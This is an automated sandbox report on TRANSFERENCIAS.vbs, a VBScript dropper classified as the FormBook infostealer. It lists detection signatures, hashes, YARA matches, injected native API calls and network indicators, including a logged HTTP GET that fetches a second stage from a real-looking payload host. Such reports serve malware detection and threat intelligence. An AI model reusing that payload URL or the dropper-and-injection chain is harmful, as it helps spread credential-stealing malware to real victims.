Windows Analysis Report
TRANSFERENCIAS.vbs

Overview

General Information

Sample name:	TRANSFERENCIAS.vbs
Analysis ID:	1525549
MD5:	b378b2b63f8ee49548ea6e851b601321
SHA1:	8910d7499ed420934921e4407e18bdf92cc5bbae
SHA256:	c7da43b1032582ef7d03c48e749bbb56b18d2da5360a29341ada35ce67900e2e
Tags:	vbsuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Potential malicious VBS script found (has network functionality)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:49704 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.2086216650.000001615D7A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2054204916.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082243144.000001615D7C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2082427583.000001615D7A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2086853744.000001615E450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2083593147.000001615D7A7000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2058303544.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Potential malicious VBS script found (has network functionality)

Source:

Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /Io2SD/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /Io2SD/sirdeeeeee.txt HTTP/1.1Host: transfer.adttemp.com.brConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: transfer.adttemp.com.br

Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003243000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://transfer.adttemp.com.brd
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.adttemp.com.br
Source: temp_executable.exe, 00000002.00000002.2079427255.0000000003227000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2058303544.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr	String found in binary or memory: https://transfer.adttemp.com.br/Io2SD/sirdeeeeee.txt

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:49704 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2557276095.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042C563 NtClose,	3_2_0042C563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC35C0 NtCreateMutant,LdrInitializeThunk,	3_2_02CC35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_02CC2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_02CC2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC4340 NtSetContextThread,	3_2_02CC4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3090 NtSetValueKey,	3_2_02CC3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3010 NtOpenDirectoryObject,	3_2_02CC3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC4650 NtSuspendThread,	3_2_02CC4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2AD0 NtReadFile,	3_2_02CC2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2AF0 NtWriteFile,	3_2_02CC2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2AB0 NtWaitForSingleObject,	3_2_02CC2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2BE0 NtQueryValueKey,	3_2_02CC2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2BF0 NtAllocateVirtualMemory,	3_2_02CC2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2B80 NtQueryInformationFile,	3_2_02CC2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2BA0 NtEnumerateValueKey,	3_2_02CC2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2B60 NtClose,	3_2_02CC2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC39B0 NtGetContextThread,	3_2_02CC39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2EE0 NtQueueApcThread,	3_2_02CC2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2E80 NtReadVirtualMemory,	3_2_02CC2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2EA0 NtAdjustPrivilegesToken,	3_2_02CC2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2E30 NtWriteVirtualMemory,	3_2_02CC2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2FE0 NtCreateFile,	3_2_02CC2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2F90 NtProtectVirtualMemory,	3_2_02CC2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2FA0 NtQuerySection,	3_2_02CC2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2FB0 NtResumeThread,	3_2_02CC2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2F60 NtCreateProcessEx,	3_2_02CC2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2F30 NtCreateSection,	3_2_02CC2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2CC0 NtQueryVirtualMemory,	3_2_02CC2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2CF0 NtOpenProcess,	3_2_02CC2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2CA0 NtQueryInformationToken,	3_2_02CC2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2C60 NtCreateKey,	3_2_02CC2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2C00 NtQueryInformationProcess,	3_2_02CC2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2DD0 NtDelayExecution,	3_2_02CC2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2DB0 NtEnumerateKey,	3_2_02CC2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3D70 NtOpenThread,	3_2_02CC3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2D00 NtSetInformationFile,	3_2_02CC2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC3D10 NtOpenProcessToken,	3_2_02CC3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2D10 NtMapViewOfSection,	3_2_02CC2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC2D30 NtUnmapViewOfSection,	3_2_02CC2D30

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_02FA3558	2_2_02FA3558
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_02FA1930	2_2_02FA1930
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_02FA354B	2_2_02FA354B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402350	3_2_00402350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042EB83	3_2_0042EB83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FCFB	3_2_0040FCFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00404486	3_2_00404486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FD03	3_2_0040FD03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00402E60	3_2_00402E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004166B3	3_2_004166B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040FF23	3_2_0040FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DFA3	3_2_0040DFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D503E6	3_2_02D503E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD739A	3_2_02CD739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4A352	3_2_02D4A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D34C	3_2_02C7D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4132D	3_2_02D4132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F0CC	3_2_02D3F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4F0E0	3_2_02D4F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D470E9	3_2_02D470E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D481CC	3_2_02D481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9B1B0	3_2_02C9B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D501AA	3_2_02D501AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC516C	3_2_02CC516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5B16B	3_2_02D5B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80100	3_2_02C80100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D416CC	3_2_02D416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAC6E0	3_2_02CAC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8C7C0	3_2_02C8C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4F7B0	3_2_02D4F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB4750	3_2_02CB4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90770	3_2_02C90770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3E4F6	3_2_02D3E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D42446	3_2_02D42446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C81460	3_2_02C81460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4F43F	3_2_02D4F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D50591	3_2_02D50591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2D5B0	3_2_02D2D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D47571	3_2_02D47571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90535	3_2_02C90535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3DAC6	3_2_02D3DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8EA80	3_2_02C8EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD5AA0	3_2_02CD5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2DAAC	3_2_02D2DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D47A46	3_2_02D47A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FA49	3_2_02D4FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D03A6C	3_2_02D03A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D46BD7	3_2_02D46BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CCDBF9	3_2_02CCDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAFB80	3_2_02CAFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4AB40	3_2_02D4AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FB76	3_2_02D4FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C938E0	3_2_02C938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBE8F0	3_2_02CBE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C768B8	3_2_02C768B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C92840	3_2_02C92840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9A840	3_2_02C9A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD800	3_2_02CFD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C929A0	3_2_02C929A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5A9A6	3_2_02D5A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C99950	3_2_02C99950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB950	3_2_02CAB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA6962	3_2_02CA6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4EEDB	3_2_02D4EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4CE93	3_2_02D4CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA2E90	3_2_02CA2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C99EB0	3_2_02C99EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90E59	3_2_02C90E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4EE26	3_2_02D4EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C82FC8	3_2_02C82FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9CFE0	3_2_02C9CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91F92	3_2_02C91F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FFB1	3_2_02D4FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D04F40	3_2_02D04F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FF09	3_2_02D4FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD2F28	3_2_02CD2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB0F30	3_2_02CB0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4FCF2	3_2_02D4FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C80CF2	3_2_02C80CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30CB5	3_2_02D30CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C90C00	3_2_02C90C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D09C32	3_2_02D09C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAFDC0	3_2_02CAFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8ADE0	3_2_02C8ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA8DBF	3_2_02CA8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C93D40	3_2_02C93D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D41D5A	3_2_02D41D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D47D73	3_2_02D47D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9AD00	3_2_02C9AD00

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02C7B970 appears 266 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02CC5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02CD7E54 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02D0F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 02CFEA12 appears 84 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: TRANSFERENCIAS.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2556886268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
